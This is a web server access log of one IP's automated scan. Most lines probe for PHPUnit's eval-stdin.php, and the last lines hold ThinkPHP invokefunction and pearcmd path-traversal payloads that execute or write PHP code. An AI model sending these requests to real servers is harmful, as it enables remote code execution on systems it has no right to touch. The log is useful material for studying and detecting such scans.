119.8.169.21 - - [23/Aug/2025:15:56:31 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:32 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:32 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:32 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:33 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:33 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:33 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:33 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:34 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:34 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:34 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:35 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:35 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:35 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:36 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:36 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:37 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 64855 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:38 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:39 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151669 "-" "libredtail-http"
119.8.169.21 - - [23/Aug/2025:15:56:40 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151669 "-" "libredtail-http"
